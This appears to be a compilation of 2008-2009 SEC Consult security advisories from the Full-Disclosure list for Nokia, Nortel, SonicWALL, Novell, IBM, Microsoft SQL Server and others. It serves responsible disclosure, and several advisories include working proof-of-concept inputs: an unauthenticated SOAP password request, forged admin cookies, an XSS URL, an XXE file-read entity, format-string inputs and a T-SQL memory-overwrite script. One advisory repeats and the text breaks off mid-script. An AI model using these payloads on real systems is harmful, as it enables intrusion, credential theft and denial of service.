[Full-disclosure] SEC Consult SA-20090707-0 :: Symbian S60 / Nokia firmware media codecs multiple memory corruption vulnerabilities
SEC Consult Security Advisory 20090707-0 == title: Symbian S60 / Nokia firmware media codecs multiple memory corruption vulnerabilities vulnerable version: All Nokia smartphones with multimedia capabilities are likely vulnerable (tested on E61, E71, N96) impact: Critical homepage: http://www.nokia.com/ found: May 2009 by: Bernhard Mueller / SEC Consult Vulnerability Lab == Vulnerability overview: --- Multiple memory corruption vulnerabilities have been identified in multimedia codecs used by the RealPlayer and MMS viewer on Nokia's Symbian/S60 based smartphones. An attacker could leverage these bugs to gain control of the program counter register and execute arbitrary code on a target smartphone. The bugs can be triggered directly inside the MMS viewer of the target, by sending an MMS with an embedded video file. Vulnerability description: -- This advisory describes multiple bugs found within several libraries: * rarender.dll * STH264HWDecHwDevice.dll * clntcore.dll * HxMmfCtrl.dll * mdfh264payloadformat.dll * MMFDevSound.dll * ArmRV89Codec.dll The effects that can be triggered with manipulated video files range fromuser panic exceptions to exploitable data abort conditions that can be used to indirectly influence function pointers and gain control of the exploited process. A more detailed analysis, as well as the testing approach used to identifiy the vulnerabilities, can be found in the whitepaper From 0 to 0day in Symbian available at: https://www.sec-consult.com/files/Pwning_Nokia_V1.03_PUB.pdf Proof of concept: - SEC Consult will not release a full proof of concept exploit to the public. Vulnerable versions: All Nokia / Symbian S60 smartphones with RealPlayer are likely vulnerable. The test and debugging subject was a Nokia N96 smartphone with firmware version 11.018. The resulting files were also sent to a Nokia E61i and a Nokia E71 and crashed either the MMS application or the operating system. Vendor contact timeline: 2008-06-13: Full fuzzing results sent to Nokia 2009-06-30: Whitepaper sent to Nokia 2009-07-06: Limited public release Patch: -- No patch is available at the time of this writing. Workaround: --- From an end user perspective, security best practices should be applied that are similar to those required on desktop PCs. The following list contains some of the most important guidelines: . * Perform regular software updates * Do not install unnecessary applications and services * Use Anti Virus software * Take care when browsing the web * Do not open SMS, MMS or emails from unknown sources25 -- SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com www.sec-consult.com EOF Bernhard Mueller / @2009 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Pwning Nokia phones (and other Symbian based smartphones)
Hello, I'll just leave this here ;) https://www.sec-consult.com/files/SEC_Consult_Vulnerability_Lab_Pwning_Symbian_V1.03_PUBLIC.pdf Abstract: 1. Perform static analysis of XIP ROM images (dumping, restoring import and export tables, searching for unsafe function calls) 2. Enable run mode debugging of system binaries running from ROM, by cracking the AppTRK debug agent 3. (Ab-)use the AppTRK debug agent as a foundation for dynamic vulnerability analysis 3. Build an exemplary file fuzzer for the video- and audio codecs shipped with current Nokia smartphones 4. List and briefly analyze the identified bugs 5. Discuss further ideas and concepts, such as jailbreak shellcode, and an IRC bot trojan for Symbian We aim to show that it is possible to find and exploit bugs on Symbian smartphones, even in preinstalled system applications, without having access to special development hardware, and that exploits and worms similar to those found on desktop systems may be possible on Symbian. The bugs listed in this paper have been sent to Nokia and are currently under review. Mobile phone manufacturers should be aware that remote vulnerabilities of the kind discussed in this paper could be used in targeted attacks to remotely compromise a smartphone (track GPS, turn on mic, etc.), or as a means of propagation for mobile network worms. -- _ Bernhard Mueller Security Consultant SEC Consult Unternehmensberatung GmbH www.sec-consult.com A-1190 Vienna, Mooslackengasse 17 phone +43 1 8903043 34 fax +43 1 8903043 15 mobile+43 676 840301 718 email b.muel...@sec-consult.com Firmenbuch Wiener Neustadt: 227896t, UID: ATU56165223 Firmensitz: Prof. Dr. Stephan Korenstraße 10, A-2700 Wiener Neustadt Advisor for your information security. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SEC Consult SA-20090525-1 :: Nortel Contact Center Manager Server Password Disclosure Vulnerability
SEC Consult Security Advisory 20090525-1 == title: Nortel Contact Center Manager Server Password Disclosure program: Nortel Contact Center Manager Server vulnerable version: 6.0 homepage: http://www.nortel.com/ccms found: 2008-11-14 by: David Matscheko / SEC Consult Vulnerability Lab permanent link: https://www.sec-consult.com/advisories_e.html#a57 == Vendor description: --- Contact Center Manager Server (CCMS) offers a scalable solution for dynamic contact center environments requiring sophistication and differentiation in the care offered to their customers. CCMS provides skill-based routing; call treatment flexibility, real time displays, multimedia routing, and comprehensive management and reporting functionality - empowering contact center managers with the tools and agility to deliver unique and unprecedented care to their customers. The rich scripting language supports multifaceted call routing and treatment decisions based on combinations of real time conditions. [source: http://www.nortel.com/ccms] Vulnerability overview: --- The Nortel Contact Center Manager Server web application provides a SOAP interface. This interface does not need authorisation and responds to certain requests with sensitive information. Vulnerability description: -- The following SOAP request queries the user data for the user sysadmin: --- POST /Common/WebServices/SOAPWrapperCommon/SOAPWrapperCommonWS.asmx HTTP/1.1 Host: 10.1.2.3 Content-Type: text/xml; charset=utf-8 SOAPAction: http://SoapWrapperCommon.CCMA.Applications.Nortel.com/SOAPWrapperCommon_UsersWS_GetServers_Wrapper; Content-Length: 661 ?xml version=1.0 encoding=utf-8? soap:Envelope xmlns:xsi=http://www.w3.org/2001/XMLSchema-instance; xmlns:xsd=http://www.w3.org/2001/XMLSchema; xmlns:soap=http://schemas.xmlsoap.org/soap/envelope/; soap:Body SOAPWrapperCommon_UsersWS_GetServers_Wrapper xmlns=http://SoapWrapperCommon.CCMA.Applications.Nortel.com; ccmaUserNamestring/ccmaUserName clientIPstring/clientIP componentIDstring/componentID sessionIDstring/sessionID strUserIDstring/strUserID strPasswordstring/strPassword /SOAPWrapperCommon_UsersWS_GetServers_Wrapper /soap:Body /soap:Envelope --- The following is an excerpt of the response to the previous query. It contains the user sysadmin with the corresponding password (password, server IP address, and server name has been changed): --- lt;rs:datagt; lt;z:row ID='0' ServerName='abcd01' ServerIP='10.1.2.3' ServerDescription='abcd01' ServerUserID='sysadmin' ServerPassword='pwd4hugo' ServerType='1' SystemVersion='6.0' OpenQueue='0' HeteroNetworking='0' Network='0' ServerSWBuild='4.4F' ServerSULevel='CCMS_6.0_SU_05' ServerDPLevel='CCMS_6.0_SUS_0503' BasicIVR='1' GracePeriodState='3' RefreshIntervalsElapsed='0'/gt; lt;/rs:datagt; --- Proof of concept: - This vulnerability can be exploited with a web browser and plugins / web proxy. Vulnerable versions: The version tested was 06.00.004.03 with the following updates applied: CCMA_6.0_SU_05 CCMA_6.0_SUS_0501 CCMA_6.0_SUS_0502 Prior versions are most likely also vulnerable. Vendor contact timeline: January 2009: Vendor informed about vulnerability 2009-05-14: Patch available 2009-05-25: Public Release Patch: -- The vendor has released a vulnerability fix which addresses the issue. In addition, the vendor has released a public security advisory containing update instructions. URL: http://support.nortel.com/go/main.jsp?cscat=BLTNDETAILid=905808 -- SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com www.sec-consult.com EOF David Matscheko / @2009 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SEC Consult SA-20090525-4 :: SonicOS Format String Vulnerability
SEC Consult Security Advisory 20090525-4 == title: SonicOS Format String Vulnerability program: SonicWALL Global VPN Client vulnerable version: PRO 4100 SonicOS 4.0.0.2-51e Standard and Enhanced possibly other versions homepage: http://www.sonicwall.com found: October 2006 by: lofi42 permanent link: https://www.sec-consult.com/advisories_e.html#a54 == Product description: SonicOS Enhanced (SonicOSe) is the latest version of SonicWALL's powerful SonicOS operating system, designed for the next generation of SonicWALL firewall/VPN appliances. Vulnerability overview: --- A format string vulnerability exists in the logfile parsing function of SonicOS. An attacker could crash the system or execute arbitrary code by injecting format string metacharacters into the logfile, if an administrator subsequently uses the SonicOS GUI to view the log. Proof of concept: - There are multiple ways to inject format string characters into the logs. The following methods can be used to test for the vulnerability: 1. CFS: Add ebay.com to your Forbidden Domains and access http://www.ebay.com/%s%s%s%s%s%s/. 2. GroupVPN: Establish an GroupVPN Tunnel and enter at the XAUTH Username %s%s%s%s%s. 3. Webfrontend: Enter at the Login Page of your SonicWALL as Username %s %s%s%s%s. SEC Consult will not release code execution exploits for this vulnerability to the public. Vendor contact timeline: 2006: Vulnerability found 2006.10.25: Vulnerability first reported to vendor 2009.02.17: Vulnerability reported to vendor again 2009.03.16: Request for status update 2009.04.21: Request for status update 2009.05.25: Public Release Patch: -- SEC Consult was not able to get any vendor feedback on this issue. We are currently not aware of a patch or workaround. -- SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com www.sec-consult.com EOF SEC Consult Vulnerability Lab / @2009 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SEC Consult SA-20090525-3 :: SonicWALL Global VPN Client Local Privilege Escalation Vulnerability
SEC Consult Security Advisory 20090525-3 == title: SonicWALL Global VPN Client Local Privilege Escalation Vulnerability program: SonicWALL Global VPN Client vulnerable version: Global VPN Client = 4.0.0.835 possibly other versions homepage: http://www.sonicwall.com found: October 2006 by: lofi42 permanent link: https://www.sec-consult.com/advisories_e.html#a55 == Vendor description: --- The SonicWALL Global VPN Client offers an easy-to-use, easy-to-manage Virtual Private Network (VPN) solution that provides users at distributed locations with secure, reliable remote access via broadband, wireless and dial-up connections. [source: http://www.sonicwall.com/downloads/Global_VPN_DS_US.pdf] Vulnerability overview: --- A local privilege escalation vulnerability exists in SonicWALL Global VPN client. By exploiting this vulnerability, a local attacker could execute code with LocalSystem privileges. Vulnerability description: -- During installation of SonicWALL Global VPN Client permissions for installation folder %ProgramFiles%\SonicWALL\SonicWALL Global VPN Client by default are set to Everyone:Full Control without any warning. The Service RampartSvc is started from this folder. Services are started under LocalSystem account. There is no protection of service files. It's possible for unprivileged users to replace service executable with the file of his choice to get full access with LocalSystem privileges. Proof of concept: - This vulnerability can be exploited without any special exploit code. Vendor contact timeline: 2006: Vulnerability found 2006.10.25: Vulnerability first reported to vendor 2009.02.17: Vulnerability reported to vendor again 2009.03.16: Request for status update 2009.04.21: Request for status update 2009.05.25: Public Release Patch: -- SEC Consult was not able to get any vendor feedback on this issue. We are currently not aware of a patch or workaround. -- SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com www.sec-consult.com EOF SEC Consult Vulnerability Lab / @2009 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SEC Consult SA-20090525-2 :: SonicWALL Global Security Client Local Privilege Escalation Vulnerability
SEC Consult Security Advisory 20090525-2 == title: SonicWALL Global Security Client Local Privilege Escalation Vulnerability program: SonicWALL Global Security Client vulnerable version: 1.0.0.15 and possibly other versions homepage: http://www.sonicwall.com found: October 2006 by: lofi42 permanent link: https://www.sec-consult.com/advisories_e.html#a56 == Vendor description: --- The SonicWALL Global Security Client offers IT professionals the capability to manage a mobile user’s online access, based upon corporate policies, in order to ensure optimal security of the network and maximize network resources. Instant messaging, high-risk Web sites and network file access can all be allowed or disallowed as security and productivity concerns dictate. [source: http://www.sonicwall.com/downloads/DS_GlobalSecurityClient_A4.pdf] Vulnerability overview: --- Local exploitation of a design error in SonicWALLs Global Security Client could allow attackers to obtain increased privileges. Vulnerability description: -- The problem specifically exists because SYSTEM privileges are not dropped when accessing the GSC properties from the System Tray applet. The vulnerability can be exploited by right-clicking the System Tray icon, choosing Log, right click Event Viewer, Open Log File The opened file selected can be abused by navigating to C:\WINDOWS \SYSTEM32\, right-clicking cmd.exe, then selecting Open; doing so spawns a command shell with SYSTEM privileges. Proof of concept: - This vulnerability can be exploited without any special exploit code. Vendor contact timeline: 2006: Vulnerability found 2006.10.25: Vulnerability first reported to vendor 2009.02.17: Vulnerability reported to vendor again 2009.03.16: Request for status update 2009.04.21: Request for status update 2009.05.25: Public Release Patch: -- SEC Consult was not able to get any vendor feedback on this issue. We are currently not aware of a patch or workaround. -- SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com www.sec-consult.com EOF SEC Consult Vulnerability Lab / @2009 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SEC Consult SA-20090525-0 :: Nortel Contact Center Manager Server Authentication Bypass Vulnerability
SEC Consult Security Advisory 20090525-0 == title: Nortel Contact Center Manager Server Authentication Bypass program: Nortel Contact Center Manager Server vulnerable version: 6.0 homepage: http://www.nortel.com/ccms found: 2008-11-14 by: Bernhard Mueller / SEC Consult Vulnerability Lab permanent link: https://www.sec-consult.com/advisories_e.html#a58 == Vendor description: --- Contact Center Manager Server (CCMS) offers a scalable solution for dynamic contact center environments requiring sophistication and differentiation in the care offered to their customers. CCMS provides skill-based routing; call treatment flexibility, real time displays, multimedia routing, and comprehensive management and reporting functionality - empowering contact center managers with the tools and agility to deliver unique and unprecedented care to their customers. The rich scripting language supports multifaceted call routing and treatment decisions based on combinations of real time conditions. [source: http://www.nortel.com/ccms] Vulnerability overview: --- The Nortel Contact Center Manager Server web application relies on client side cookies to check the roles of authenticated users. Authentication can be bypassed by manually setting the required cookies. By exploiting this vulnerability, an attacker can bypass authentication and access the Nortel Contact Center Manager Server. Vulnerability description: -- The following cookies have to be set to access all menu items: LoginMsgSwitch=True LoginMsgAccepted=True Logged=True isAdmin=True LoginMsgSwitch=True LoginMsgAccepted=True IsConfig=1 IsUser=1 IsRTD=1 IsReport=1 IsScript=1 IsAudit=1 IsEmHelp=1 isOutbound=1 UserID=x AuditSwitch=on LoginMsgAccepted=True Proof of concept: - This vulnerability can be exploited with a web browser and plugins / web proxy. Vulnerable versions: The version tested was 06.00.004.03 with the following updates applied: CCMA_6.0_SU_05 CCMA_6.0_SUS_0501 CCMA_6.0_SUS_0502 Prior versions are most likely also vulnerable. Vendor contact timeline: January 2009: Vendor informed about vulnerability 2009-05-14: Patch available 2009-05-25: Public Release Patch: -- The vendor has released a vulnerability fix which addresses the issue. In addition, the vendor has released a public security advisory containing update instructions. URL: http://support.nortel.com/go/main.jsp?cscat=BLTNDETAILid=905698 -- SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com www.sec-consult.com EOF Bernhard Mueller / @2008 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SEC Consult SA-20090415-0 :: Multiple Vulnerabilities in Novell Teaming
SEC Consult Security Advisory 20090415-0 == title: Novell Teaming Multiple Vulnerabilities * Username Enumeration * Multiple Cross Site Scripting * Includes vulnerable Liferay portal program: Novell Teaming vulnerable version: 1.0.3 homepage: http://www.novell.com/products/teaming/ found: February 2009 by: Michael Kirchner, SEC Consult Vulnerability Lab link: https://www.sec-consult.com/files/20090415-0-novell-teaming.txt == Vendor description: --- Web conferencing software from Novell. Teaming and conferencing offers a number of solutions to improve productivity for enterprises, with web conferencing just one of those solutions. [source: http://www.novell.com/products/teaming/] Vulnerability overview: --- Multiple vulnerabilities have been identified in Novell Teaming. These include enumeration of usernames, information disclosure, and cross site scripting flaws. An attacker could leverage these vulnerabilities to collect information about the system and its users and conduct effective (XSS supported) hybrid phishing attacks. Vulnerability description: - 1. Username enumeration: User authentication takes place via a login form at: https://teaming.example.com/c/portal/login The web application reacts differently for valid and invalid usernames (Please enter a valid login / Auhtentication failed). This allows an attacker to deduce wether a spedific username exists. The attacker could use this flaw to generate a list of usernames for dictionary- or bruteforce-attacks. 2. Cross site scripting: The parameters p_p_state and p_p_mode are not validated or escaped by the web application. Script code can be injected into these parameters, allowing for cross site scripting attacks. Example: https://teaming.example.com/web/guest/home?p_p_id=82p_p_action=1p_p_state=%3Cscript%3Ealert('xss+vulnerability')%3C/script%3Ep_p_mode=viewp_p_col_id=column-2p_p_col_pos=1p_p_col_count=2_82_struts_action=%2Flanguage%2Fview_82_languageId=de_DE 3. Vulnerable Liferay portal: Novell Teaming includes a version of Liferay portal with known vulnerabilities (two cross site scripting flaws): * Liferay Portal login Cross-Site Scripting Vulnerability http://secunia.com/advisories/27537/ * Liferay Portal emailAddress Cross-Site Scripting http://secunia.com/advisories/27821/ - Proof of concept: - No special exploit code is required to exploit this vulnerabilities. Vulnerable versions: Version 1.0.3 of Novell Teaming is vulnerable to the issues described. Prior versions are most likely also vulnerable. Vendor contact timeline: 2009-02-19: Vendor informed about vulnerabilities 2009-04-14: Patches available Patch: -- The vendor has provided fixes for the issues described. In addition, two Technical Information Documents containing update instructions have been released. These can be found at the following URLs: * TID 7002997 http://www.novell.com/support/php/search.do?cmd=displayKCdocType=kcexternalId=7002997sliceId=1docTypeID=DT_TID_1_1dialogID=33090060stateId=1%200%2033084737 * TID 7002999 http://www.novell.com/support/php/search.do?cmd=displayKCdocType=kcexternalId=7002999sliceId=1docTypeID=DT_TID_1_1dialogID=33090060stateId=1%200%2033084737 -- SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com www.sec-consult.com EOF SEC Consult Vulnerability Lab / @2009 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SEC Consult SA-20090305-0 :: NextApp Echo XML Injection Vulnerability
SEC Consult Security Advisory 20090305-0 title: NextApp Echo XML Injection Vulnerability program: NextApp Echo vulnerable version: Echo2 2.1.1 homepage: http://echo.nextapp.com/site/echo2 found: Feb. 2008 by: Anonymous / SEC Consult Vulnerability Lab permanent link: http://www.sec-consult.com/files/20090305-0_echo_nextapp_xml_injection.txt Vendor description: --- Echo is a platform for building web-based applications that approach the capabilities of rich clients. The applications are developed using a component-oriented and event-driven API, eliminating the need to deal with the page-based nature of browsers. To the developer, Echo works just like a user interface toolkit. Vulnerability overview: --- Unverified XML Data is passed from the client (Webbrowser) to the NextApp Echo Engine and consequently to an underlying XML Parser. This leading to a typical XML Injection scenario. Vulnerability description: -- All XML requests for the framework are created by javascript and than sent to the Server via POST HTTP requests. A typical requests would look like the following: ---cut here--- client-message xmlns=http://www.nextapp.com/products/echo2/climsg; trans-id=3 focus=c_25message-part xmlns= processor=EchoPropertyUpdateproperty component-id=c_25 name=textaa/propertyproperty component-id=c_25 name=horizontalScroll value=0/property component-id=c_25 name=verticalScroll value=0//message-partmessage-part xmlns= processor=EchoActionaction component-id=c_25 name=action//message-part/client-message ---cut here--- By manipulating the POST content it is possible to inject arbitrary XML declarations- and tags. Proof of concept: - The following entity declaration would create a new XML entity with the content of the boot.ini file which can be referenced in the following XML request content: ---cut here--- ?xml version=1.0?!DOCTYPE sec [!ELEMENT sec ANY!ENTITY mytestentity SYSTEM file:///c:\boot.ini] ---cut here--- Vulnerable versions: NextApp Echo v2.1.0.rc2 Vendor contact timeline: 2009/02/16: Vendor notified via email 2009/02/24: Patch available Patch: - The vendor has released an update which addresses the vulnerability. The update can be downloaded at: http://echo.nextapp.com/site/node/5742 -- SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com www.sec-consult.com # EOF SEC Consult Vulnerability Lab / @2009 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SEC Consult SA-20090305-1 :: IBM Director CIM Server Remote Denial of Service Vulnerability
SEC-CONSULT Security Advisory 20090305-1 = title: IBM Director CIM Server Remote Denial of Service Vulnerability program: IBM Director for Windows vulnerable version: = 5.20.3 Service Update 2 homepage: http://www-03.ibm.com/systems/management/director/ found: Sept. 2008 by: Bernhard Mueller / SEC Consult Vulnerability Lab permanent link: http://www.sec-consult.com/files/20090305-1_IBM_director_DoS.txt = Product description: --- IBM Director is an application that can track and view system configurations of remote computers. It is available for Linux, AIX, and Windows servers. Vulnerability overview: The CIM server contained in the IBM Director suite for Microsoft Windows is vulnerable to a remote denial of service attack. The vulnerability allows an attacker to crash the service remotely. It will not be possible to reach the IBM Director agent until the service is manually restarted. Vulnerability details: --- CIM server crashes on receiving requests that contain overlong consumer names. The error condition does not allow for the redirection of program flow. M-POST /CIMListener/[Ax512] HTTP/1.1 CIMOperation: MethodCall CIMExport: MethodRequest CIMExportMethod: ExportIndication [some xml] Fix: --- The vendor has adressed this vulnerability in service update 2 for IBM Director agent 5.20.3. Download link: https://www14.software.ibm.com/webapp/iwm/web/reg/download.do?source=dmpS_PKG=director_x_520S_TACT=smslang=en_UScp=UTF-8 vendor status: --- vendor notified: 2008-11-03 patch available: 2009-03-09 -- SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com www.sec-consult.com # EOF Bernhard Mueller, SEC Consult Vulnerability Lab / @2009 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SEC Consult SA-20081219-0 :: Fujitsu-Siemens WebTransactions remote command injection vulnerability
SEC-CONSULT Security Advisory 20081219-0 === title: Fujitsu-Siemens WebTransactions Remote Command Injection Vulnerability program: WebTransactions vulnerable version: =7.1 homepage: http://www.fujitsu-siemens.com/ found: 05/2008 by: Person at SEC Consult who does not want to be named permanent link: http://www.sec-consult.com/files/20081219-0_fujitsu-siemens_webta_cmdexec.txt === Vendor description: --- With WebTransactions openSEAS provides a product which allows approved host applications to be used in new business processes and modern application scenarios. WebTransactions provides all possibilities to prepare existing host applications for new web based scenarios. Host applications and –data can be used via Standard Web browser without need to change anything on the host side. Vulnerability overview: --- Fujitsu-Siemens WebTransactions is vulnerable to remote command injection due to insufficient input validation. Under certain conditions, WBPublish.exe passes unvalidated user input to the system() function when cleaning up temporary session data. This vulnerability allows an attacker to execute arbitrary commands on the affected system. The vulnerability does not require prior authentication and can be exploited from a web browser. Vulnerability details: A proof of concept exploit will not be released to the public. Vendor status: --- vendor notified: 2008-05-16 vendor response: 2008-05-16 patch available: 2008-06-18 A patch and vendor advisory for this vulnerability is available at: http://bs2www.fujitsu-siemens.de/update/securitypatch.htm -- ~ SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com www.sec-consult.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Microsoft SQL Server 2005 sp_replwritetovarbin memory overwrite (update to SEC Consult SA-20081209)
Update to SEC Consult Security Advisory 20081210-0 (Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability) === Summary: By calling the extended stored procedure sp_replwritetovarbin, an attacker can write limited values to arbitrary locations in process memory. This vulnerability has been described in a prior security advisory for MS SQL Server 2000: http://www.securityfocus.com/archive/1/499042 Moreno Zilli of Swisscom has reported that MS SQL Server 2005 is vulnerable to the same attack. This has been confirmed in a lab test conducted by SEC Consult. Our public security advisory has been updated accordingly: http://www.sec-consult.com/files/20081209_mssql-sp_replwritetovarbin_memwrite.txt Workaround: --- Remove the sp_replwriterovarbin extended stored procedure. Run the following as an administrator: execute dbo.sp_dropextendedproc 'sp_replwritetovarbin' See also: Removing an Extended Stored Procedure from SQL Server http://msdn.microsoft.com/en-us/library/aa215995(SQL.80).aspx Patch: -- According to an email received by Microsoft in September, a fix for this vulnerability has been completed. The release schedule for this fix is currently unknown. Vendor timeline: --- Vendor notified: 2008-04-17 Vendor response: 2008-04-17 Last response from Microsoft: 09-29-2008 Request for update status 1: 10-14-2008 Request for update status 2: 10-29-2008 Request for update status 3: 11-12-2008 Request for update status 4 and prenotification about advisory release date: 11-28-2008 Public release: 12-09-2008 Update (added MS-SQL 2005): 12-10-2008 SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com www.sec-consult.com EOF Bernhard Mueller / @2008 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SEC Consult SA-20081109-0 :: Microsoft SQL Server 2000 sp_replwritetovarbin limited memory overwrite vulnerability
SEC Consult Security Advisory 20081209-0 = title: Microsoft SQL Server 2000 sp_replwritetovarbin limited memory overwrite vulnerability program: Microsoft SQL Server 2000 vulnerable version: =8.00.2039 homepage: www.microsoft.com found: 04-12-2008 by: Bernhard Mueller (SEC Consult Vulnerability Lab) perm. link: http://www.sec-consult.com/files/20081209_mssql-2000-sp_replwritetovarbin_memwrite.txt = Product description: Microsoft SQL Server is a relational database management system (RDBMS) produced by Microsoft. Its primary query language is Transact-SQL, an implementation of the ANSI/ISO standard Structured Query Language (SQL) used by both Microsoft and Sybase. Vulnerabilty overview: -- By calling the extended stored procedure sp_replwritetovarbin, and supplying several uninitialized variables as parameters, it is possible to trigger a memory write to a controlled location. Depending on the underlying Windows version, it is / may be possible to use this vulnerability to execute arbitrary code in the context of the vulnerable SQL server process. In a default configuration, the sp_replwritetovarbin stored procedure is accessible by anyone. The vulnerability can be exploited by an authenticated user with a direct database connection, or via SQL injection in a vulnerable web application. Vulnerability details: -- The following T-SQL script can be used to test for the vulnerability: DECLARE @buf NVARCHAR(4000), @val NVARCHAR(4), @counter INT SET @buf = ' declare @retcode int, @end_offset int, @vb_buffer varbinary, @vb_bufferlen int, @buf nvarchar; exec master.dbo.sp_replwritetovarbin 1, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' SET @val = CHAR(0x41) SET @counter = 0 WHILE @counter 3000 BEGIN SET @counter = @counter + 1 SET @buf = @buf + @val END SET @buf = @buf + ''',''1'',''1'',''1'', ''1'',''1'',''1'',''1'',''1'',''1''' EXEC master..sp_executesql @buf This triggers an access violation exception (write to address 0x41414141). The vulnerability has been successfully used to execute arbitrary code on a lab machine. SEC Consult will not release code execution exploits for this vulnerability to the public. Workaround: --- Remove the sp_replwriterovarbin extended stored procedure. Run the following as an administrator: execute dbo.sp_dropextendedproc 'sp_replwritetovarbin' See also: Removing an Extended Stored Procedure from SQL Server http://msdn.microsoft.com/en-us/library/aa215995(SQL.80).aspx Patch: -- According to an email received by Microsoft in September, a fix for this vulnerability has been completed. The release schedule for this fix is currently unknown. Vendor timeline: --- Vendor notified: 2008-04-17 Vendor response: 2008-04-17 Last response from Microsoft: 09-29-2008 Request for update status 1: 10-14-2008 Request for update status 2: 10-29-2008 Request for update status 3: 11-12-2008 Request for update status 4 and prenotification about advisory release date: 11-28-2008 Public release: 11-09-2008 -- SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com www.sec-consult.com EOF Bernhard Mueller / @2008 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SEC Consult SA-20081109-0 :: Microsoft SQL Server 2000 sp_replwritetovarbin limited memory overwrite vulnerability
SEC Consult Security Advisory 20081209-0 = title: Microsoft SQL Server 2000 sp_replwritetovarbin limited memory overwrite vulnerability program: Microsoft SQL Server 2000 vulnerable version: =8.00.2039 homepage: www.microsoft.com found: 04-12-2008 by: Bernhard Mueller (SEC Consult Vulnerability Lab) perm. link: http://www.sec-consult.com/files/20081209_mssql-2000-sp_replwritetovarbin_memwrite.txt = Product description: Microsoft SQL Server is a relational database management system (RDBMS) produced by Microsoft. Its primary query language is Transact-SQL, an implementation of the ANSI/ISO standard Structured Query Language (SQL) used by both Microsoft and Sybase. Vulnerabilty overview: -- By calling the extended stored procedure sp_replwritetovarbin, and supplying several uninitialized variables as parameters, it is possible to trigger a memory write to a controlled location. Depending on the underlying Windows version, it is / may be possible to use this vulnerability to execute arbitrary code in the context of the vulnerable SQL server process. In a default configuration, the sp_replwritetovarbin stored procedure is accessible by anyone. The vulnerability can be exploited by an authenticated user with a direct database connection, or via SQL injection in a vulnerable web application. Vulnerability details: -- The following T-SQL script can be used to test for the vulnerability: DECLARE @buf NVARCHAR(4000), @val NVARCHAR(4), @counter INT SET @buf = ' declare @retcode int, @end_offset int, 